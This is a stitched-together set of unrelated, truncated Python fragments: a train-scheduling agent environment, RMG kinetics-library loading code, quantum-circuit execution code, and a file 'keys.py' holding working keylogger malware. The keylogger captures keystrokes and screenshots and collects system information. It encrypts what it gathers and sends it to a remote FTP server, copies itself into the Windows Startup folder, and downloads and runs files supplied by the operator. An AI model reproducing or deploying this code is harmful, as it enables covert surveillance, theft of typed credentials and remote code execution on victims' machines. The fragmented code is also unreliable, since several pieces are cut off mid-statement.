def __init__(self):
self.q = []
def __len__(self):
return len(self.q)
def __iter__(self):
for i, _ in enumerate(self.q):
yield self.q[i]
def hsort(self):
heapq.heapify(self.q)
def push(self, data):
heapq.heappush(self.q, data)
def pop(self):
return heapq.heappop(self.q)
class Msg:
def __init__(self, res, rel_time, nbr_node):
'''
Message to be stored in the environment to release locked path in the future
res : (in_path id, out_path id, pf id, stoppage time)
rel_time : time at which to release the resource
nbr_node : 1 if resource is only single path else 0
'''
self.res = res
self.rel_time = rel_time
self.nbr_node = nbr_node
def __lt__(self, other):
if self.rel_time < other.rel_time:
return True
else:
return False
def write_schedule(sol):
file = open('CNB_sched.txt', 'w')
for line in sol:
tname, pf, arr_path, dep_path, arr_t, dep_t, shift, _ = line
ans = f'{tname},{pf},{"-".join(arr_path)},{"-".join(dep_path)},{arr_t},{dep_t},{shift}\n'
file.writelines(ans)
file.close()
def read_edges(fname):
edges = []
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split(', ')
x1 = line[0][1:]
x2 = line[1][:-2]
# print([x1, x2])
edges.append(tuple([x1, x2]))
return edges
def read_layout(fname):
glayout = {}
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split()
node = line[0]
x = int(line[1])
y = int(line[2])
glayout[node] = [x, y]
return glayout
def read_trains(fname):
'''
data is a dict having
name : name of Train
in_dir : incoming direction (0 ... n_dirs)
out_dir : outgoing direction (0 ... n_dirs)
arr_t : arrival time (0 .. 1440)
stop : stoppage time
pref_pf : list of preferred platforms
prty : priority (1 .. 4) higher has more priority
'''
train_info_set = []
file = open(fname, 'r')
for line in file.readlines():
line = line.rstrip().split()
name = line[0]
curr_date = datetime.strptime(line[1], date_format)
in_dir = line[2]
out_dir = line[3]
arr_t = int(line[4])
stop = int(line[5])
pref_pf = line[6].split('-')
prty = line[7]
data = {
"name": name,
"in_dir": in_dir,
"out_dir": out_dir,
"arr_t": arr_t,
"stop": stop,
"pref_pf": pref_pf,
"prty": prty
}
train_info_set.append(Train(data))
return train_info_set
def create_station():
station = nx.Graph()
directs = [
(f"D{i}", {"ntype": "arr", "name": f"D{i}"}) for i in range(1, n_dir+1)
]
platforms = [
(f"P{i}", {"ntype": "pf", "name": f"P{i}"}) for i in range(1, n_pfs+1)
]
mid_nodes = [
(f"{chr(97 + i)}", {"ntype": "mid", "name": f"{chr(97 + i)}"})
for i in range(n_mid)
]
# station.add_nodes_from(arr_directs)
station.add_nodes_from(platforms)
station.add_nodes_from(mid_nodes)
station.add_nodes_from(directs)
# station.add_nodes_from(dep_directs)
edge_list = read_edges('test_station.txt')
station.add_edges_from(edge_list)
arr_paths = read_arr_paths()
dep_paths = read_dep_paths()
glayout = read_layout('test_layout.txt')
# for v, data in station.nodes.data():
# print(v, data)
# print(station.nodes.data())
# show_station(station, glayout)
return station, directs, platforms, mid_nodes, arr_paths, dep_paths
def show_station(G, glayout):
"""Function shows graph in matplotlib
G: Graph
glayout: The coordinates of the nodes in the graph to show
"""
# print(G.nodes.data())
color = [colors[data["ntype"]] for v, data in G.nodes.data()]
# for node, data in G.nodes.data():
# print(node, data)
label_dict = {node: data["name"] for node, data in G.nodes.data()}
# pos = nx.multipartite_layout(G, subset_key="layer")
# print(pos)
plt.figure(figsize=(8, 8))
nx.draw(G, glayout, node_color=color, with_labels=True, labels=label_dict)
plt.axis("equal")
plt.show()
def read_arr_paths():
arr_paths = []
# dep_paths = []
dir_names = [f"D{i}" for i in range(1, n_dir+1)]
for name in dir_names:
file = open(f'arr_paths/test_arr_{name}.txt', 'r')
for line in file.readlines():
line = line.rstrip().split()
arr_paths.append(line)
return arr_paths
def read_dep_paths():
dep_paths = []
# dep_paths = []
dir_names = [f"D{i}" for i in range(1, n_dir+1)]
for name in dir_names:
file = open(f'dep_paths/test_dep_{name}.txt', 'r')
for line in file.readlines():
line = line.rstrip().split()
dep_paths.append(line)
return dep_paths
def save_agent(agent, fname):
dill.dump(agent, file=open(f'./saved_agents/{fname}.pickle', 'wb'))
def load_agent(fname):
with open(f"./saved_agents/{fname}.pickle", "rb") as file:
agent = dill.load(file)
return agent
class Train:
def __init__(self, data):
'''
data is a dict having
name : name of Train
in_dir : incoming direction (0 ... n_dirs)
out_dir : outgoing direction (0 ... n_dirs)
arr_t : arrival time (0 .. 1440)
stop : stoppage time
pref_pf : list of preferred platforms
prty : priority (1 .. 4) higher has more priority
'''
self.data = dict()
for key, value in data.items():
self.data[key] = value
self.reward = 0
# self.in_dir = one_hot([self.data["in_dir"]], n_dir)
# self.out_dir = one_hot(self.data["out_dir"], n_dir)
# self.pfs = one_hot(self.data["pref_pf"], n_pfs)
# self.prty = one_hot([self.data["prty"]], n_prty)
def __str__(self):
name = f'Train Name: {self.data["name"]}\n'
in_dir = f'In Direction: {self.data["in_dir"]}\n'
out_dir = f'Out Direction: {self.data["out_dir"]}\n'
arr_t = f'Arrival Time: {self.data["arr_t"]}\n'
stop = f'Stoppage: {self.data["stop"]}\n'
pref_pfs = f'Pref Pfs: {self.data["pref_pf"]}\n'
prty = f'Priority: {self.data["prty"]}\n'
return name + arr_t + prty
def __lt__(self, other):
if self.data["arr_t"] < other.data["arr_t"]:
return True
elif self.data["arr_t"] == other.data["arr_t"]:
if self.data["prty"] > other.data["prty"]:
return True
else:
return False
else:
return False
def get_dep_time(self):
return self.data["arr_t"] + self.data["stop"]
def delay(self):
self.data["arr_t"] = (self.data["arr_t"] + 1) % tmax
class Agent:
def __init__(self):
pass
def act(self, train, data, tq):
'''
Get an action from an Agent
action : (train,in_path,out_path,pf,delay)
'''
in_dir = train.data["in_dir"]
out_dir = train.data["out_dir"]
# get in_paths
possible_in_paths = []
for path_id in in_paths_from[in_dir]:
if not data[0][path_id]:
possible_in_paths.append(path_id)
if not len(possible_in_paths):
return (train, -1, -1, -1, 1)
in_path = self.choose_in_path(possible_in_paths)
pf = arr_paths[in_path][-1]
possible_out_paths = []
for path_id in out_paths_from[pf][out_dir]:
if not data[1][path_id]:
possible_out_paths.append(path_id)
if not len(possible_out_paths):
return (train, -1, -1, -1, 1)
out_path = self.choose_out_path(possible_out_paths)
return (train, in_path, out_path, pf, 0)
def choose_in_path(self, in_paths):
'''
returns the id of the chosen in_path
'''
return random.choice(in_paths)
def choose_out_path(self, out_paths):
'''
returns the id of the chosen in_path
'''
return random.choice(out_paths)
def get_reward(self, reward):
pass
class Agent_MCTS:
def __init__(self, t_list, in_state, out_state):
self.n_train = 0 # no. of episodes trained
self.q_table = dict()
for t in t_list:
self.q_table[t.data["name"]] = {
"in_path_val": [0 for i in range(len(in_state))],
"out_path_val": [0 for i in range(len(out_state))],
"in_path_count": [0 for i in range(len(in_state))],
"out_path_count": [0 for i in range(len(out_state))]}
def act(self, train, data, tq):
'''
Get an action from an Agent
action : (train,in_path,out_path,pf,delay)
'''
in_dir = train.data["in_dir"]
out_dir = train.data["out_dir"]
# get in_paths
possible_in_paths = []
for path_id in in_paths_from[in_dir]:
if not data[0][path_id]: # if in_path_id is not locked
possible_in_paths.append(path_id)
if not len(possible_in_paths): # if there are no possible in_paths no choice but delay
return (train, -1, -1, -1, 1)
# choose the in_path
in_path = self.choose_in_path(possible_in_paths)
# get platform from chosen in_path
pf = arr_paths[in_path][-1]
possible_out_paths = []
for path_id in out_paths_from[pf][out_dir]:
if not data[1][path_id]: # if out_path_id is not locked
possible_out_paths.append(path_id)
if not len(possible_out_paths):
return (train, -1, -1, -1, 1)
out_path | |
x: x.index)
flib = open(os.path.join(path, 'rateLibrary.txt'), 'w')
flib.write('// The format for the data in this rate library\n')
flib.write('Arrhenius_EP\n\n')
fcom = codecs.open(os.path.join(path, 'comments.rst'), 'w', 'utf-8')
fcom.write('-------\n')
fcom.write('General\n')
fcom.write('-------\n')
fcom.write(self.longDesc.strip() + '\n\n')
for entry in entries:
flib.write('{0:<5d} '.format(entry.index))
for label in entry.label.split(';'):
flib.write('{0:<23} '.format(label))
if entry.data.Tmax is None:
Trange = '{0:g} '.format(entry.data.Tmin.value)
else:
Trange = '{0:g}-{1:g} '.format(entry.data.Tmin.value, entry.data.Tmax.value)
flib.write('{0:<12}'.format(Trange))
flib.write('{0:11.2e} {1:9.2f} {2:9.2f} {3:11.2f} '.format(
entry.data.A.value * factor,
entry.data.n.value,
entry.data.alpha.value,
entry.data.E0.value / 4184.
))
if entry.data.A.isUncertaintyMultiplicative():
flib.write('*{0:<6g} '.format(entry.data.A.uncertainty))
else:
flib.write('{0:<7g} '.format(entry.data.A.uncertainty * factor))
flib.write('{0:6g} {1:6g} {2:6g} '.format(
entry.data.n.uncertainty,
entry.data.alpha.uncertainty,
entry.data.E0.uncertainty / 4184.
))
if not entry.rank:
entry.rank = 0
flib.write(' {0:<4d} {1}\n'.format(entry.rank, entry.shortDesc))
fcom.write('------\n')
fcom.write('{0}\n'.format(entry.index))
fcom.write('------\n')
fcom.write(entry.longDesc.strip() + '\n\n')
flib.close()
fcom.close()
################################################################################
class KineticsLibrary(Database):
"""
A class for working with an RMG kinetics library.
"""
def __init__(self, label='', name='', shortDesc='', longDesc=''):
Database.__init__(self, label=label, name=name, shortDesc=shortDesc, longDesc=longDesc)
def __repr__(self):
return '<KineticsLibrary "{0}">'.format(self.label)
def getSpecies(self):
"""
Return a dictionary containing all of the species in this kinetics
library.
"""
speciesDict = {}
def speciesMatch(speciesA, speciesB):
for moleculeA in speciesA.molecule:
for moleculeB in speciesB.molecule:
if moleculeA.isIsomorphic(moleculeB):
return True
return False
entries = self.entries.values()
for entry in entries:
for reactant in entry.item.reactants:
if reactant.label not in speciesDict:
speciesDict[reactant.label] = reactant
elif not speciesMatch(reactant, speciesDict[reactant.label]):
print reactant.molecule[0].toAdjacencyList()
print speciesDict[reactant.label].molecule[0].toAdjacencyList()
raise DatabaseError('Species label "{0}" used for multiple species in kinetics library {1}.'.format(reactant.label, self.label))
for product in entry.item.products:
if product.label not in speciesDict:
speciesDict[product.label] = product
elif not speciesMatch(product, speciesDict[product.label]):
import pdb; pdb.set_trace()
print product.molecule[0].toAdjacencyList()
print speciesDict[product.label].molecule[0].toAdjacencyList()
print product.molecule[0].isIsomorphic(speciesDict[product.label].molecule[0])
raise DatabaseError('Species label "{0}" used for multiple species in kinetics library {1}.'.format(product.label, self.label))
return speciesDict
def markValidDuplicates(self, reactions1, reactions2):
"""
Check for reactions that appear in both lists,
and mark them as (valid) duplicates.
"""
for r1 in reactions1:
for r2 in reactions2:
if (r1.reactants == r2.reactants and
r1.products == r2.products and
r1.reversible == r2.reversible
):
r1.duplicate = True
r2.duplicate = True
def checkForDuplicates(self):
"""
Check that all duplicate reactions in the kinetics library are
properly marked (i.e. with their ``duplicate`` attribute set to
``True``).
"""
for entry0 in self.entries.values():
reaction0 = entry0.item
if not reaction0.duplicate:
# This reaction is not marked as a duplicate reaction
# This means that if we find any duplicate reactions, it is an error
for entry in self.entries.values():
reaction = entry.item
if (reaction0 is not reaction and
reaction0.reactants == reaction.reactants and
reaction0.products == reaction.products and
reaction0.reversible == reaction.reversible
):
# We found a duplicate reaction that wasn't marked!
raise DatabaseError('Unexpected duplicate reaction {0} in kinetics library {1}.'.format(reaction0, self.label))
def convertDuplicatesToMulti(self):
"""
Merge all marked duplicate reactions in the kinetics library
into single reactions with multiple kinetics.
"""
print "trying to find duplicates"
entries_to_remove = []
for entry0 in self.entries.values():
if entry0 in entries_to_remove:
continue
reaction0 = entry0.item
if not reaction0.duplicate:
continue
print "Found a duplicate reaction: {0}".format(reaction0)
duplicates = [entry0]
for entry in self.entries.values():
reaction = entry.item
if reaction0 is reaction:
continue
if reaction0.isIsomorphic(reaction, eitherDirection=False):
if reaction0.reversible != reaction.reversible:
print "Reactions isomorphic but with different reversibilities"
continue
duplicates.append(entry)
assert len(duplicates)>1
kineticsList = []
longDesc = ''
for entry in duplicates:
kinetics = entry.data
kineticsList.append(kinetics)
Tmin = kinetics.Tmin
Tmax = kinetics.Tmax
Pmin = kinetics.Pmin
Pmax = kinetics.Pmax
longDesc += entry.longDesc+'\n'
entry0.data = MultiKinetics(kineticsList=kineticsList, Tmin=Tmin, Tmax=Tmax, Pmin=Pmin, Pmax=Pmax)
entry0.longDesc = longDesc
entries_to_remove.extend(duplicates[1:])
for entry in entries_to_remove:
print "removing duplicate reaction with index {0}.".format(entry.index)
del(self.entries[entry.index])
print "NB. the entries have not been renumbered, so these indices are missing."
def load(self, path, local_context=None, global_context=None):
Database.load(self, path, local_context, global_context)
# Generate a unique set of the species in the kinetics library
speciesDict = self.getSpecies()
# Make sure all of the reactions draw from only this set
entries = self.entries.values()
for entry in entries:
entry.item.reactants = [speciesDict[spec.label] for spec in entry.item.reactants]
entry.item.products = [speciesDict[spec.label] for spec in entry.item.products]
self.checkForDuplicates()
def loadEntry(self,
index,
reactant1,
product1,
kinetics,
reactant2=None,
reactant3=None,
product2=None,
product3=None,
degeneracy=1,
label='',
duplicate=False,
reversible=True,
reference=None,
referenceType='',
shortDesc='',
longDesc='',
history=None
):
reactants = [Species(label=reactant1.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant1)])]
if reactant2 is not None: reactants.append(Species(label=reactant2.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant2)]))
if reactant3 is not None: reactants.append(Species(label=reactant3.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(reactant3)]))
products = [Species(label=product1.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product1)])]
if product2 is not None: products.append(Species(label=product2.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product2)]))
if product3 is not None: products.append(Species(label=product3.strip().splitlines()[0].strip(), molecule=[Molecule().fromAdjacencyList(product3)]))
comment = "Reaction and kinetics from {0}.".format(self.label)
if shortDesc.strip():
comment += "{0!s}\n".format(shortdesc.strip())
if longDesc.strip():
comment += str(re.sub('\s*\n\s*','\n',longDesc))
kinetics.comment = comment.strip()
self.entries[index] = Entry(
index = index,
label = label,
item = Reaction(reactants=reactants, products=products, degeneracy=degeneracy, duplicate=duplicate, reversible=reversible),
data = kinetics,
reference = reference,
referenceType = referenceType,
shortDesc = shortDesc,
longDesc = longDesc.strip(),
history = history or [],
)
def saveEntry(self, f, entry):
"""
Write the given `entry` in the kinetics library to the file object `f`.
"""
return saveEntry(f, entry)
def loadOld(self, path):
"""
Load an old-style RMG kinetics library from the location `path`.
"""
path = os.path.abspath(path)
self.loadOldDictionary(os.path.join(path,'species.txt'), pattern=False)
species = dict([(label, Species(label=label, molecule=[entry.item])) for label, entry in self.entries.iteritems()])
reactions = []
reactions.extend(self.__loadOldReactions(os.path.join(path,'reactions.txt'), species))
if os.path.exists(os.path.join(path,'pdepreactions.txt')):
pdep_reactions = self.__loadOldReactions(os.path.join(path,'pdepreactions.txt'), species)
# RMG-Py likes otherwise equivalent PDep and non-pdep reactions to be marked as duplicates
self.markValidDuplicates(reactions, pdep_reactions)
reactions.extend(pdep_reactions)
self.entries = {}
for index, reaction in enumerate(reactions):
entry = Entry(
index = index+1,
item = reaction,
data = reaction.kinetics,
)
entry.longDesc = reaction.kinetics.comment
reaction.kinetics.comment = ''
self.entries[index+1] = entry
reaction.kinetics = None
self.checkForDuplicates()
self.convertDuplicatesToMulti()
def __loadOldReactions(self, path, species):
"""
Load an old-style reaction library from `path`. This algorithm can
handle both the pressure-independent and pressure-dependent reaction
files. If the pressure-dependent file is read, the extra pressure-
dependent kinetics information is ignored unless the kinetics database
is a seed mechanism.
"""
reactions = []
# Process the reactions or pdepreactions file
try:
inUnitSection = False; inReactionSection = False
Aunits = []; Eunits = ''
reaction = None; kinetics = None
next_reaction_comment = ''
fdict = open(path, 'r')
for line in fdict:
line, comment = splitLineAndComment(line)
line = line.strip()
if len(line) == 0:
comment = comment.strip()
# collect all comment lines and assume they're for the following reaction
next_reaction_comment += comment + '\n'
continue
else: # line is not empty
if inUnitSection:
if 'A:' in line or 'E:' in line:
units = line.split()[1]
if 'A:' in line:
Aunits0 = units.split('/') # Assume this is a 3-tuple: moles or molecules, volume, time
Aunits0[1] = Aunits0[1][0:-1] # Remove '3' from e.g. 'm3' or 'cm3'; this is assumed
Aunits = [
'', # Zeroth-order
'{0}^-1'.format(Aunits0[2]), # First-order
'{0}^3/({1}*{2})'.format(Aunits0[1], Aunits0[0], Aunits0[2]), # Second-order
'{0}^6/({1}^2*{2})'.format(Aunits0[1], Aunits0[0], Aunits0[2]), # Third-order
]
elif 'E:' in line:
Eunits = units
elif inReactionSection:
if '=' in line:
# This line contains a reaction equation, (high-P) Arrhenius parameters, and uncertainties
# Strip out "(+M)" from line
line = line.replace("(+M)", "")
line = line.replace("(+m)", "")
items = line.split()
# Find the reaction arrow
for arrow in ['<=>', '=>', '=', '->']:
if arrow in items:
arrowIndex = items.index(arrow)
break
# Find the start of the data
try:
temp = float(items[-6])
dataIndex = -6
except ValueError:
dataIndex = -3
# Find the reactant and product items
hasThirdBody = False
reactantItems = []
for item in items[0:arrowIndex]:
if item != '+':
for i in item.split('+'):
if i != '' and i != 'M' and i != 'm': reactantItems.append(i)
elif i != '' and (i == 'M' or i == 'm'): hasThirdBody = True
productItems = []
for item in items[arrowIndex+1:dataIndex]:
if item != '+':
for i in item.split('+'):
if i != '' and i != 'M' and i != 'm': productItems.append(i)
elif i != '' and (i == 'M' or i == 'm'): hasThirdBody = True
reactants = []; products = []
for item in reactantItems:
try:
reactants.append(species[item])
except KeyError:
raise DatabaseError('Reactant {0} not found in species dictionary.'.format(item))
for item in productItems:
try:
products.append(species[item])
except KeyError:
raise DatabaseError('Product {0} not found in species dictionary.'.format(item))
if dataIndex == -6:
A, n, Ea, dA, dn, dEa = items[-6:]
A = | |
<filename>source/keys.py
'''
Python 2.7 implementation with some additional functionality:
-systeminfo data is uploaded when the file is executed
-all the data uploaded to FTP server is encrypted (keys_retriever.py is used to collect/decrypt the data)
-ability to take screenshot with simple kl.UploadScreenShot()
-auto-downloader so you can use keys_retriever.py to upload some file and it will be executed on the target, keys_retrieve.py allows to set few parameters to it like (persistence/execute/upload results if it's nirsoft application)
-use several ftp accounts in case if 1 is not available (drivehq.com has 25 logins/day limit so that's why there's such function)
-"keep alive" (NOOP) packet is sent each minute to the FTP
'''
import pyHook
import pythoncom
import sys, os
import ftplib, datetime
import threading, time
from Queue import Queue
import io, subprocess
from urllib2 import urlopen
import socket
import win32api
from ctypes import Structure, windll, c_uint, sizeof, byref #needed for GetIdleTime()
from random import randint
from PIL import ImageGrab, Image
import StringIO
class LASTINPUTINFO(Structure): #needed for GetIdleTime()
_fields_ = [
('cbSize', c_uint),
('dwTime', c_uint),
]
xorMap = [235, 235, 126, 240, 203, 237, 81, 160, 9, 37, 204, 43, 190, 31, 76, 98, 53, 200, 222, 172, 184, 172, 157, 214, 128, 194, 175, 119, 254, 25, 25, 193, 109, 190, 240, 162, 184, 184, 114, 117, 57, 63, 167, 61, 104, 86, 146, 85, 114, 205, 0, 73, 162, 188, 129, 22, 67, 26, 80, 50, 190, 7, 91, 15, 56, 127, 226, 61, 172, 204, 76, 72, 40, 154, 65, 85, 8, 223, 211, 178, 149, 106, 57, 204, 236, 147, 54, 246, 59, 90, 43, 148, 9, 50, 253, 74, 143, 201, 48, 252, 236, 236, 139, 30, 124, 44, 21, 245, 179, 53, 85, 243, 230, 21, 49, 7, 239, 153, 46, 9, 1, 119, 105, 25, 71, 139, 75, 58, 43, 229, 88, 234, 226, 201, 1, 69, 16, 71, 97, 32, 195, 197, 215, 37, 219, 81, 243, 202, 181, 177, 193, 98, 179, 92, 180, 72, 219, 176, 115, 173, 16, 212, 118, 24, 204, 18, 123, 155, 197, 254, 226, 208, 80, 120, 46, 222, 152, 213, 68, 33, 153, 62, 192, 162, 16, 225, 110, 81, 65, 156, 212, 31, 26, 178, 195, 23, 141, 241, 48, 180]
def ExceptionHandler(func): #the exe won't popup "Couldn't execute keys script" but will output encrypted exception to e.mm file and "gracefully" exit
def call(*args, **kwargs):
try: return func(*args, **kwargs)
except Exception as e:
#with open("e.mm", "wb") as f:
#f.write(XorText("Exception:\n"+str(e), xorMap)) #it's not a good idea to save it to a file if it's in the startup folder...
print "Handled exception:\n"+str(e)
raise SystemExit
return call
@ExceptionHandler
def GetIdleTime():
lastInputInfo = LASTINPUTINFO()
lastInputInfo.cbSize = sizeof(lastInputInfo)
windll.user32.GetLastInputInfo(byref(lastInputInfo))
millis = windll.kernel32.GetTickCount() - lastInputInfo.dwTime
return millis / 1000.0
@ExceptionHandler
def ProcessCmd(command):
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
r = proc.stdout.read() + proc.stderr.read()
return r[:len(r)-2]
@ExceptionHandler
def XorText(text, xorMap):
xoredText = ""
for i, letter in enumerate(text):
xoredText += chr(ord(text[i]) ^ (xorMap[i%len(xorMap)] ^ (xorMap[(len(text)- 1)%len(xorMap)]))) #chr(ord(letter) ^ xorMap[i%len(xorMap)])
return xoredText
@ExceptionHandler
def FilterKey(k, text):
if len(text) > len(k) and len(text) > 3:
if text[len(text)-len(k):] == k and (len(k) > 1 or any(specialKey == k and specialKey == text[len(text)-1] and specialKey == text[len(text)-2] for specialKey in ["w", "s", "a", "d"])):
return ""
return k
@ExceptionHandler
def GetPublicIP():
return str(urlopen('http://ip.42.pl/raw').read())
@ExceptionHandler
def GetLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 0))
IP = s.getsockname()[0]
except: IP = '127.0.0.1'
finally: s.close()
return str(IP)
class Keylogger:
@ExceptionHandler
def __init__(self, **kwargs):
self.debug = kwargs.get("debug", False)
self.postfreq = kwargs.get("postfreq", 20)
self.q = Queue()
self.xorMap = xorMap
self.windowname = ""
self.strbuff = ""
self.secSendFile = time.clock()
self.secKeepConAlive = time.clock()
self.secCheckScreenCaptureRequest = time.clock()
self.secDownloadFile = time.clock()
self.ftpFolderName = "_" + "".join(letter for letter in ProcessCmd("echo %USERNAME%") if letter.isalnum())
@ExceptionHandler
def __del__(self):
try: self.ftp.quit()
except:
try: self.ftp.close()
except: pass
try: self.hookManager.UnhookKeyboard()
except: pass
@ExceptionHandler
def StartKeyCapture(self):
self.hookManager = pyHook.HookManager()
self.hookManager.KeyDown = self.OnKeypressCallback
self.hookManager.HookKeyboard()
pythoncom.PumpMessages()
@ExceptionHandler
def OnKeypressCallback(self, press):
if press.Ascii not in range(32,126):
self.q.put([FilterKey("<"+press.Key+">", self.strbuff), press.WindowName])
else:
self.q.put([FilterKey(chr(press.Ascii), self.strbuff), press.WindowName])
return True
@ExceptionHandler
def CopyItselfToStartup(self):
desired_file = ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" + os.path.basename(sys.argv[0])
if not os.path.isfile(desired_file):
with open(os.path.basename(sys.argv[0]), "rb") as base_f, open(desired_file, "wb") as new_f:
new_f.write(base_f.read())
if self.debug: print "Copied itself to startup"
@ExceptionHandler
def FTP_Connect(self, server, port, name_list, pswd_list):
for name, pswd in zip(name_list, pswd_list):
try:
self.ftp = ftplib.FTP()
self.ftp.connect(server, port)
self.ftp.login(name, pswd)
except: continue
directories = []
self.ftp.retrlines('LIST', directories.append)
if not any(self.ftpFolderName in d for d in directories):
self.ftp.mkd(self.ftpFolderName)
if self.debug: print "Connected to the ftp server (" + ", ".join([server, name, pswd]) + ")"
return True
raise ValueError("Couldn't connect to: " + server + " using the following credentials:\n" + "".join(u + " : " + p + "\n" for u,p in zip(name_list, pswd_list)))
@ExceptionHandler
def UploadSystemInfo(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("_" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\_")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\_\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(GetPublicIP() +"\n"+ GetLocalIP() + "\n" + ProcessCmd("systeminfo"), xorMap)))
if self.debug: print "Systeminfo uploaded"
@ExceptionHandler
def UploadScreenShot(self, **kwargs):
screenFolder = "vv" if kwargs.get("vidstream") == True else "ii"
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any(screenFolder in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName + "\\" + screenFolder)
ss_pil = ImageGrab.grab()
imgBuff = StringIO.StringIO()
ss_pil.save(imgBuff, "JPEG")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName + "\\" + screenFolder + "\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(XorText(imgBuff.getvalue(), xorMap)))
imgBuff.close()
if self.debug: print "ScreenShot uploaded (\\" + screenFolder +")"
@ExceptionHandler
def IsScreenCaptureStreamRequested(self, **kwargs): #not developed it much, it requires more work to be done to be fully functional
if kwargs.get("dircheck", False) == True:
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("vv" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\vv")
return False
if any(f.startswith("s") for f in self.ftp.nlst("\\"+self.ftpFolderName+"\\vv")):
return True
return False
@ExceptionHandler
def IsFileDownloadAvailable(self):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("f" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\f")
if "f.mm" in self.ftp.nlst("\\"+self.ftpFolderName+"\\f"):
return True
return False
@ExceptionHandler
def DownloadFile(self):
if self.debug: print "DownloadFile"
dataChunks = []
if self.debug: print "0"
self.ftp.retrbinary('RETR ' + "\\"+ self.ftpFolderName +"\\f\\f.mm", dataChunks.append)
if self.debug: print 1
fileInfo, fileData = XorText("".join(dataChunks), self.xorMap).split("###########################_____________________###############################")
if self.debug: print 2
destinationFileName = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationFileName" in v][0]
destinationPath = [v.split("=")[1] for v in fileInfo.split("\n") if "destinationPath" in v][0]
destinationPath = (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/") if destinationPath == "startup" else (ProcessCmd("echo %USERPROFILE%").replace("\\", "/") + "/" + destinationPath)
execute = True if [v.split("=")[1] for v in fileInfo.split("\n") if "execute" in v][0] == "True" else False
params = [v.split("=")[1] for v in fileInfo.split("\n") if "params" in v][0]
isNirsoft = True if [v.split("=")[1] for v in fileInfo.split("\n") if "nirsoft" in v][0] == "True" else False
desiredFile = destinationPath + destinationFileName
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
if os.path.isfile(desiredFile):
os.remove(desiredFile)
with open(desiredFile, "wb") as f:
f.write(fileData)
if self.debug: print "Downloaded "+ destinationFileName
if execute:
ProcessCmd("start \"\" \""+ desiredFile + "\"" + (" "+params if params != "none" else ""))
if self.debug: print "Executed "+ destinationFileName
if isNirsoft:
nsOutput = destinationFileName.split(".")[0] + ".mm"
for i in range(100):
time.sleep(0.1)
if os.path.isfile(nsOutput):
break
else:
if self.debug: print "Nirsoft output not available"
os.remove(desiredFile)
return
with open(nsOutput, "rb") as f:
data = XorText(f.read(),self.xorMap)
os.remove(nsOutput)
os.remove(desiredFile)
if self.debug: print "Nirsoft application and output files removed"
self.UploadNirsoftData(data, nsOutput)
self.ftp.delete("\\"+ self.ftpFolderName +"\\f\\f.mm")
if self.debug: print "Deleted "+ destinationFileName + " from ftp server"
@ExceptionHandler
def UploadNirsoftData(self, data, fileName):
directories = []
self.ftp.retrlines('LIST \\' + self.ftpFolderName, directories.append)
if not any("n" in d for d in directories):
self.ftp.mkd("\\"+self.ftpFolderName+"\\n")
self.ftp.storbinary("STOR " + "\\"+ self.ftpFolderName +"\\n\\" + datetime.datetime.now().strftime("%d-%m-%Y___%H-%M") + ".mm", io.BytesIO(data))
if self.debug: print "Nirsoft data uploaded"
@ExceptionHandler
def Update(self):
try:data = self.q.get(block=False)
except:data = ["",self.windowname]
if data[1] != self.windowname:
self.windowname = data[1]
self.strbuff += "\n\n["+self.windowname+"]\n"
#print "secSendFile=" + str(self.secSendFile) + ", time.clock()=" + str(time.clock())
#print data[0]
self.strbuff += data[0]
if (time.clock() - self.secKeepConAlive) > 60: #every 1 min
self.secKeepConAlive = time.clock()
if self.debug: print "Keep connection alive is going to be sent."
self.ftp.voidcmd("NOOP")
if self.debug: print "Keep connection | |
"barrier": continue
if key.startswith("c"): n2q += value
else: n1q += value
qc_tr_xi = n2q / (n1q + n2q)
#print(f"... qc_tr_xi = {qc_tr_xi} {n1q} {n2q}")
# use noise model from execution options if given for simulator
this_noise = noise
if backend_exec_options != None and "noise_model" in backend_exec_options:
this_noise = backend_exec_options["noise_model"]
#print(f"... using custom noise model: {this_noise}")
# Initiate execution (with noise if specified and this is a simulator backend)
if this_noise is not None and backend.name().endswith("qasm_simulator"):
#print("... performing simulation")
simulation_circuits = circuit["qc"]
# use execution options if set for simulator
if backend_exec_options != None:
# apply transformer pass if provided
if "transformer" in backend_exec_options:
#print("... applying transformer to sim!")
st = time.time()
trans_qc = transpile(circuit["qc"], backend)
simulation_circuits = backend_exec_options["transformer"](trans_qc, backend=backend)
# if transformer results in multiple circuits, divide shot count
# results will be accumulated in job_complete
# NOTE: this will need to set a flag to distinguish from multiple circuit execution
if len(simulation_circuits) > 1:
shots = int(shots / len(simulation_circuits))
if verbose_time:
print(f" *** transformer() time = {time.time() - st}")
# for noisy simulator, use execute() which works; it is unclear from docs
# whether noise_model should be passed to transpile() or run()
st = time.time()
job = execute(simulation_circuits, backend, shots=shots,
